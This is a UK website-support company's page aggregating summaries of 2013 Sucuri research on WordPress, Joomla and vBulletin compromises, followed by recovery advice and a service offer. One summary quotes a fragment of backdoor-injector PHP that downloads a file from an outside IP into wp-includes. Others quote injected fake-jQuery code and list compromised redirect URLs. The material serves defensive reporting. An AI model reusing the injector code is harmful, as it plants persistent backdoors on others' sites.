Website support, maintenance and fixes for UK businessesCall 0208 088 8371info@websupportservices.co.uk

HomeLatest WordPress security threats

Latest WordPress security threats

This page brings together recent WordPress security research and attack reports from Wordfence, Patchstack, Sucuri and WPScan. We summarise the headlines and link to the original vendor research so you can read the source in full.

1,879 reports kept since 2009. Updated automatically every 10 minutes. Last checked 4 min ago.

  1. WordPress 3.6.1 Released - Includes Security Fixes

    Research Sucuri, 12 Sep 2013

    The WordPress team just pushed out a new version of WordPress. WordPress 3.6.1 is a maintenance release that includes some security bug fixes. Straight from their release post, these are the security changes: Block unsafe PHP unserializa...

  2. Security Archive - Case Study: phpbb.com Compromised

    Research Sucuri, 10 Sep 2013

    Security Archive: It is important to remember past security incidents to make sure we don’t commit the same mistakes over and over again. The idea is to learn from our mistakes. You can read other case studies from our security archive h...

  3. Big Increase in Distributed Brute Force Attacks Against Joomla Websites

    Research Sucuri, 3 Sep 2013

    Update: Brute force protection now available: http://cloudproxy.sucuri.net/brute-force-protection A few months ago, we discussed and published details about a very large brute force attack targeting WordPress sites. The attackers (bad gu...

  4. Free Sucuri WordPress Plugin Gets New Features

    Research Sucuri, 21 Aug 2013

    We just released some major updates to our Free WordPress plugin that we recommend all WordPress users check out. Before the update, the plugin was just a simplified way to reach and scan a site using Sitecheck, now it is doing a lot mor...

  5. The Dangers External Services Present To Your Website

    Research Sucuri, 15 Aug 2013

    Today the Washington Post reported that they were victims of hack, orchestrated by the Syrian Electronic Army. This attack is interesting because it sheds light into the anatomy of attacks that appear sophisticated, but is something we’r...

  6. Joomla Hacks - Part I - Phishing

    Research Sucuri, 14 Aug 2013

    Joomla is a very popular open source CMS, dominating approximately 10% of the website market. While great for them, horrible for many others, as being popular often paints a big target on your back, at least when it comes to CMS applicat...

  7. Open Source Backdoor - Copyrighted Under GNU GPL

    Research Sucuri, 9 Aug 2013

    Malware code can be very small, and the impact can be very severe! In our daily tasks we find a lot of web-based malware that varies in size and impact. Some of the malware is well known and very easy to detect, others not so much, but t...

  8. OpenX.org Compromised and Downloads Injected with a Backdoor

    Research Sucuri, 6 Aug 2013

    We received reports that OpenX.org was compromised and the OpenX download files had a backdoor injected in them. According to Heise (in German), the malicious files were modified around November/2012, and have been undetected since. It m...

  9. New WordPress and Joomla Updates Available

    Research Sucuri, 1 Aug 2013

    If you are a WordPress or Joomla user, you better start updating your sites now. Joomla 2.5.14 Joomla 2.5.14 was released containing some critical security fixes. They didn’t provide much details, but by the summary is seems serious enou...

  10. More Creative Backdoors - Using Filename Typos

    Research Sucuri, 1 Aug 2013

    When a site gets compromised, one thing we know for sure is that the attackers will leave some piece of malware in there to allow them access back to the site. We call this type of control capability a backdoor. Backdoors are very hard t...

  11. Phishing 2.0 - Credit Card Redirection on Compromised Sites

    Research Sucuri, 26 Jul 2013

    We have seen it all when it comes to compromised sites: from silly defacements, to malware, spam, phishing and all sorts of injections. However, the bad guys are always looking to maximize their profits when they hack a site. Especially ...

  12. Sucuri CloudProxy Web Application Firewall (WAF) - Out of Beta

    Research Sucuri, 23 Jul 2013

    We are happy to announce that after more than a year in testing, Sucuri’s Cloud WAF is out of beta. CloudProxy is currently available to Sucuri customers, so if you have an account with us, you can subscribe to CloudProxy from your dashb...

  13. Dissecting a WordPress Brute Force Attack

    Research Sucuri, 22 Jul 2013

    Update: Brute force protection now available: http://cloudproxy.sucuri.net/brute-force-protection Over the past few months there has been a lot of discussion about WordPress Brute Force attacks. With that discussion has come a lot of spe...

  14. Ubuntu Forums Hacked

    Research Sucuri, 21 Jul 2013

    Ubuntu’s official forum web site (ubuntuforums.org) was hacked, defaced and all user names and passwords stolen. The forum was very popular with over 1.8 million registered users. The site is now disabled with this warning: What we know:...

  15. Malware Hidden Inside JPG EXIF Headers

    Research Sucuri, 16 Jul 2013

    A few days ago, Peter Gramantik from our research team found a very interesting backdoor on a compromised site. This backdoor didn’t rely on the normal patterns to hide its content (like base64/gzip encoding), but stored its data in the ...

  16. Fake piwik domain - piwik-stat

    Research Sucuri, 14 Jul 2013

    Piwik is an open source web analytics software that is used by many web masters. Andthe bad guys are using their popularity to try to make their malware injection harder todetect. They do that by injecting malicious javascript calls from...

  17. New juquery.com injection

    Research Sucuri, 8 Jul 2013

    Today we found a malicious iframe that was being loaded from juquery.com (another fake jquery site). Itconsisted of the following code hidden inside one of the plugins: function browser_compability() { if(function_exists('curl_init')) { ...

  18. vBulletin Infections from Adabeupdate

    Research Sucuri, 5 Jul 2013

    vBulletin is a popular forum platform that is also starting to become a popular target for web attacks. vBulletin (and vbSEO) had some serious security vulnerabilities in older versions, and when a forum using them is not properly update...

  19. Malware Infection - Blocked by Day Limit

    Research Sucuri, 27 Jun 2013

    This week while working on a compromised site, I found an interesting variation of the Blackhole injection. We work with many sites injected with Blackhole, like this one: However, on this specific site, instead of the common injection w...

  20. Google Transparency Report - Malware Distribution

    Research Sucuri, 25 Jun 2013

    Google just released their Malware Distribution Transparency Report, sharing the amount of sites compromised or distributing malware detected by their systems (Safe Browsing program). Google’s Safe Browsing program started in 2006 and si...

  21. WordPress 3.5.2 Security and Maintenance Release

    Research Sucuri, 22 Jun 2013

    The WordPress team just pushed out a new version of WordPress (3.5.2) that has some security bugs fixed. Straight from their release post, these are the security changes: Blocking server-side request forgery attacks, which could potentia...

  22. vBulletin Conditional Malware - myFTP.biz Malicious iFrames

    Research Sucuri, 13 Jun 2013

    We have to be honest here, there’s no fun in cleaning up infected .htaccess files. It’s boring, but it happens a lot! But it’s not the case here. I will also caveat that while in this specific instance we’ll be talking to one specific pl...

  23. Globo.com redirecting users to Spam ads

    Research Sucuri, 19 May 2013

    Globo.com, one of the largest Brazilian web portals (ranked #107 on Alexa and #6 for Brazilian traffic) appears to be compromised and all visits to it are being redirected to a sub page inside pagesinxt.com. If you go to g1.globo.com (or...

  24. Backdoor Injector code

    Research Sucuri, 16 May 2013

    A backdoor injector code we found on a compromised site: if(is__writable($dir."/wp-includes/")): file_put_contentz($dir.'/wp-includes/page.php', get_contentz('http://67.211.195.81/backdoorz/page.php')); touch($dir.'/wp-includes/page.php'...

  25. Auto Generated IFrames To Blackhole Exploit Kit - Following the Cookie Trail

    Research Sucuri, 6 May 2013

    We often talk about websites being compromised and injected with malware that redirect users to exploit kits. We unfortunately don’t give you a complete picture of what the distribution payload is doing on your local machine very often. ...

  26. W3 Total Cache and WP Super Cache Vulnerability Being Targeted in the Wild

    Research Sucuri, 4 May 2013

    As if on queue, almost 7 days since we released the post about the latest W3TC and WP Super Cache remote command execution vulnerability, we have started to see attacks spring up across our network. In our post you might remember this: I...

  27. Who Really Owns Your Website? “Please Stop Hotlinking My Easing Script - Use a Real CDN Instead.”

    Research Sucuri, 3 May 2013

    For the last few days, we have had some customers come to us worried thinking that their websites were compromised with some type of pop-up malware. Every time they visited their own site they would get a strange pop up: “Please stop hot...

  28. Apache Web Server Attacks Continue to Evolve

    Research Sucuri, 29 Apr 2013

    For the past few months we have seen a gradual increase in server-level compromises. In fact, every week it seems we’re handling half a dozen or so and it continues to increase. It’s one of the reasons that I have started including this ...

  29. LivingSocial Hacked - More Than 50 Million Accounts Compromised

    Research Sucuri, 27 Apr 2013

    Just as we were thinking we were going to avoid any major enterprise compromises this week, LivingSocial announces that it has been compromised and some 50 million accounts have been compromised. Based on the reports, it doesn’t seem tha...

  30. Apache Binary Backdoors on Cpanel-based servers

    Research Sucuri, 26 Apr 2013

    For the last few months we have been tracking server level compromises that have been utilizing malicious Apache modules (Darkleech) to inject malware into websites. Some of our previous coverage is available here and here. However, duri...

  31. Update WP Super Cache and W3TC Immediately - Remote Code Execution Vulnerability Disclosed

    Research Sucuri, 24 Apr 2013

    Shame on us for not catching this a month ago when it was first reported, but it seems that two of the biggest caching plugins in WordPress have what we would classify a very serious vulnerability - remote code execution (RCE), a.k.a., a...

  32. The WordPress Brute Force Attack Timeline

    Research Sucuri, 16 Apr 2013

    Authored by Daniel Cid, Tony Perez. We have been blogging about the massive brute force attacks against WordPress websites over the past few days, today we want to provide better context of the scale by sharing some more data on what we ...

  33. WordPress Malicious Plugin - WPPPM - Abusing 404 Redirects with SEO Poisoning

    Research Sucuri, 14 Apr 2013

    Bruno Borges, of our security team, came across an interesting case this week, in which a WordPress plugin was abusing the 404 rewrite rules and redirecting all traffic to SPAM pages advertising a variety of things, the most common being...

  34. Mass WordPress Brute Force Attacks? - Myth or Reality

    Research Sucuri, 12 Apr 2013

    We are seeing in the media some noise about a large distributed brute force attacks against all hosts targeting WordPress sites. According to reports, they are seeing a large botnet with more than 90,000 servers attempting to log in by c...

  35. Protecting Against WordPress Brute-Force Attacks

    Research Sucuri, 12 Apr 2013

    It was not long ago that I was sitting on a call with other members of the WordPress community in which we were talking abou brute-force. When asked why WordPress core didn’t offer more out of the box features to address the issue, the r...

  36. When Good Plugins Go Bad - SEO Spam on Joomla Websites

    Research Sucuri, 10 Apr 2013

    We recently published an article about an interesting case where a very popular WordPress Plugin (Social Media Widget), with more than 900,000 downloads, got sold and the new owners decided to use their big audience and inject spam on al...

  37. WordPress Plugin Social Media Widget Hiding Spam - Remove it now

    Research Sucuri, 9 Apr 2013

    Authored by Daniel Cid and Tony Perez. If you are using the Social Media Widget plugin (social-media-widget), make sure to remove it immediately from your website. We discovered it is being used to inject spam into websites and it has al...

  38. WordPress Security Presentation by Tony Perez

    Research Sucuri, 4 Apr 2013

    Tomorrow I will be flying to my hometown (Miami) to give a Website Security presentation to a bunch of enthusiastic online professionals at an event called WordCamp. If you’re not familiar with these events, they are global events put to...

  39. Comment SPAM Bad Neighborhood Analysis (2013-Mar)

    Research Sucuri, 25 Mar 2013

    We track and block a lot of comment SPAM via our WordPress plugin and our CloudProxy WAF. One thing we noticed is that the majority of the SPAM we detect come from the same “bad neighbors” (IP ranges that are known for sending a lot of S...

  40. Virtual Hardening with Sucuri CloudProxy

    Research Sucuri, 18 Mar 2013

    If you read our blog you know that we are really open to providing insight into malware infections, remediation and hardening tips. The goal is to help educate website owners where and when we can. Unfortunately, that education only goes...

  41. Virtual Patching for Websites with Sucuri CloudProxy

    Research Sucuri, 11 Mar 2013

    All software has bugs, and some bugs can lead to security vulnerabilities. Vulnerabilities can be extremely dangerous when your software is running over the web, allowing anyone to reach and try to attack it. That’s why patching and keep...

  42. 2012 Web Malware Trends Report Summary

    Research Sucuri, 7 Mar 2013

    Sucuri is a website security company focused on the detection and remediation of web malware. In 2012, via our SiteCheck scanner, we scanned 9,953,729 unique domains. This small report is based on the data we were able to compile from th...

  43. Website Malware - Fixing Joomla SPAM Hacks - Conditional Payloads

    Research Sucuri, 22 Feb 2013

    Our Senior Malware Engineer, Fioravante Cavallari, is at it again. I think he has made it his personal mission in life to expel all Joomla hacks, he loves them that much - true story.. 😉 In all seriousness, he found another gem yesterda...

  44. NBC Website HACKED - Be Careful Surfing

    Research Sucuri, 21 Feb 2013

    Breaking, the NBC site is currently compromised and blacklisted by Google. Anyone that visits the site (which includes any sub page) will have malicious iframes loaded as well redirecting the user to exploit kits (Redkit): *Update: Not o...

  45. Sneaky Joomla Web Malware - JavaScript Infections

    Research Sucuri, 19 Feb 2013

    So the past week has been interesting, we have been having fun with a few JavaScript infections that really forced us to put on our thinking hats. Our Senior Malware Engineer, Fioravante Cavallari, actually found the payload and dissecte...

  46. WordPress Plugin: Easy Digital Downloads - Security Flaw Discovered and Patchedd

    Research Sucuri, 16 Feb 2013

    Last night we were contacted by Adam Pickering about a security flaw discovered in Easy Digital Downloads (EDD), a free WordPress eCommerce plugin that allows you to sell digital downloads. If you use EDD and haven’t done so already, ple...

  47. Large Scale Compromises Leading to Traffic Distribution System

    Research Sucuri, 15 Feb 2013

    For the last few weeks we’ve been tracking a large scale decentralized Traffic Distribution System (TDS). It’s using hundreds of compromised sites as their first entry point. Anyone that visits the compromised sites from a search engine ...

  48. Large scale TDS redirections

    Research Sucuri, 15 Feb 2013

    Lots of compromised sites redirecting to TDS: http://1151.website.snafu.de/hkkj.html?h=1475928 http://adaptpro.co.uk/mwhi.html?h=1380448 http://aennekens.de/hozs.html?h=1180315 http://afamontserrat.org/zapn.html?h=877095 http://afhwarran...

  49. Various Shades of Malware - Abusing Your Resources

    Research Sucuri, 14 Feb 2013

    We often write about very clear cut cases of malware activity. The attacker is leveraging your traffic, redirecting it to other locations, or injecting things like iFrames in an attempt to perform some type of drive-by-download. These ar...

  50. Malware Redirection with a Delay

    Research Sucuri, 13 Feb 2013

    You visit a site and it looks good and clean. However, if you keep the page open, after maybe 20-30 seconds, you get redirected to a casino or pharma affiliate page. What is going on? We call these delayed redirections and they are becom...

Common types of WordPress compromise

WordPress compromises do not all look the same. Some are obvious to visitors, while others are designed to remain unnoticed. A site may start sending visitors to an unrelated domain, display pages or links that the owner never created, or contain a backdoor that allows an attacker to return after the visible problem has been removed.

Other compromises can involve rogue administrator accounts or fake plugins placed in the WordPress installation to blend in with legitimate software. On WooCommerce sites, malicious code may target the checkout process or other pages that handle customer data. The presence of unfamiliar code is not enough on its own to identify what happened, so the investigation needs to establish what changed, when it changed and how the attacker gained access.

Outdated components are one possible route, but compromised passwords, exposed hosting credentials and other weaknesses can also matter. WordPress recommends keeping software current, using strong passwords, controlling file permissions and maintaining reliable backups as part of normal hardening.

Signs your WordPress site may be hacked

Unexpected redirects are a common warning sign, particularly when they appear only on certain devices, browsers or traffic sources. Other clues include unfamiliar administrator users, pages you did not publish, altered titles or search snippets, unexplained file changes, new scheduled tasks, or security warnings in Google Search Console.

Performance problems can also justify investigation, but a slow site does not automatically mean malware. The same applies to unusual server load or email activity. Treat these as signals to inspect logs, files, users and recent changes rather than proof of a specific infection.

Google recommends using the Security Issues report in Search Console when hacked content or malware is suspected. A simple site search can also reveal indexed pages that do not belong to you. If you find something unexpected, record it before making changes so you have evidence to compare during cleanup.

What to do first if you think your WordPress site is hacked

Do not begin by deleting every suspicious file you can see. First take a copy of the affected site and database, note the time the problem was found and preserve relevant logs where available. This gives you something to examine if the visible symptoms return or if you need to identify the original entry point.

Change passwords for WordPress administrators, hosting, SFTP or FTP, the database and other privileged services that could have been exposed. Review all administrator accounts and remove access you do not recognise. Then decide whether the safest recovery route is a clean restoration from a known good backup or a controlled malware cleanup.

The job is not finished when the unwanted page or redirect disappears. Check themes, plugins, WordPress core, configuration files and scheduled tasks for persistence, update vulnerable components and close the route that allowed access. If Google has flagged the site, follow its hacked site guidance and request review only after the site has been cleaned. Our WordPress malware removal page explains the recovery service. Hacked Site Rescue is £249 fixed price.

Common questions

Answers to the questions we hear most about this.

How can I tell if my WordPress site has malware?

Look for unexpected redirects, unfamiliar administrator accounts, pages or links you did not create, unexplained file changes and security warnings in Google Search Console. None of these signs identifies the cause by itself, so the site still needs investigation.

Should I delete suspicious files straight away?

Not necessarily. Take a copy of the site and database first and preserve useful logs where possible. Deleting visible files before recording the incident can remove evidence without closing the route used to gain access.

Can restoring a backup fix a hacked WordPress site?

A clean backup can be an effective recovery route if it predates the compromise, but you still need to identify and fix the entry point. Otherwise the same weakness can remain after the restore.

What should I change after a WordPress hack?

Change privileged passwords, review administrator users, update vulnerable software and inspect the site for persistence such as backdoors or altered scheduled tasks. The exact steps depend on how the compromise occurred.

Think your website has been hacked?

Call us or send the details. Hacked Site Rescue is a fixed £249, and we find how the attacker got in.

Get website support